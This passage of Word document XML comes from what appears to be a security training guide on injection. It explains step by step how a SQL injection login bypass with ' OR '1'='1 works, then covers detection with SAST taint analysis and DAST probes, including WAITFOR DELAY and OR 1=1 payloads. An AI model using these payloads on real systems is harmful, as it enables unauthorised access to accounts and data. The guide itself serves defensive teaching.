    <w:p w14:paraId="474BF896" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Intended Query Structure:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username = '[DATA]' AND password = '[DATA]'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488C7E8A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Actual Executed Query:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '...'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DF4B20"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Step 4: The Interpreter Executes the Altered Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2151E00C"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 xml:space="preserve">The database engine (the interpreter) parses the incoming string. Because the single quote ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) in the payload successfully closed the developer’s string early, the database interprets the remaining text ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>OR '1'='1</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) as </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>SQL commands</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than literal text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0CE288" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The database evaluates the conditional logic: Is the username blank? (Usually false). </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> equal to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ? (Always true).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525B61C2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Because an </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>OR true</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> condition evaluates to true for every single row in the database, the entire </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> clause is bypassed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C22DF7"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Step 5: Access Granted / Data Compromised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326A1215"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 xml:space="preserve">Instead of returning an error or an empty set, the database returns the first record found in the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> table (typically the Administrator account). The application sees a successful database match, assumes the user successfully authenticated, and logs the attacker into the system with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A446FB2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Discovery &amp; Identification (How to Find It)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7DBEC2"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lastRenderedPageBreak/>
        <w:t>To effectively identify Injection vulnerabilities during an assessment, security teams utilize a combination of automated scanning, source code analysis, and manual exploitation. Here is how Injection is discovered across the security lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590BC9B4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>1. Automated Testing (Tool-Based Detection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3445E531"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Automated tools scan at different stages of the lifecycle, looking for distinct anomalies in code structure or application behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78766ABB"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Static Application Security Testing (SAST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E97148"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SAST tools scan the source code before deployment without executing the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ABBFFC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>What they look for:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> They build an Abstract Syntax Tree (AST) of the code and perform </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Taint Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . They track data from a </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Source</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (any point where untrusted user input enters the system, like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) to a </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sink</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a function that executes commands, like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>executeQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Runtime.getRuntime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>().exec()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF0DE86" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Anomaly:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If data flows from a Source to a Sink without passing through an intermediate </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sanitizer</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or Validator function, the tool flags a data-flow anomaly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49956217"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Dynamic Application Security Testing (DAST) &amp; Vulnerability Scanners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E0FB07"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DAST tools test the running application from the outside, mimicking an attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0AF9E3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>What they look for:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> They actively inject anomalous characters ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> into every input field, URL parameter, and HTTP header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2131BE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Anomalies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407DF9F1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Database Error Messages:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Looking for verbose stack traces (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>“You have an error in your SQL syntax…”</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEA586C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Time Delays:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Injecting time-sleep commands (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>WAITFOR DELAY '0:0:5'</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). If the server's response time suddenly spikes by exactly 5 seconds, an injection flaw is confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284EFC81" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Differential Content:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Comparing responses between a normal request and a logically altered request (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>id=5</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>id=5 OR 1=1</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). If the page content changes or reveals extra data, it indicates structural manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7939AF76" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>2. Manual Code Review (Source Code Analysis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350D3076"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When reviewing a codebase manually, you are hunting for patterns where data boundaries blur. Look for the following technical "red flags":</w:t>
      </w:r>
    </w:p>
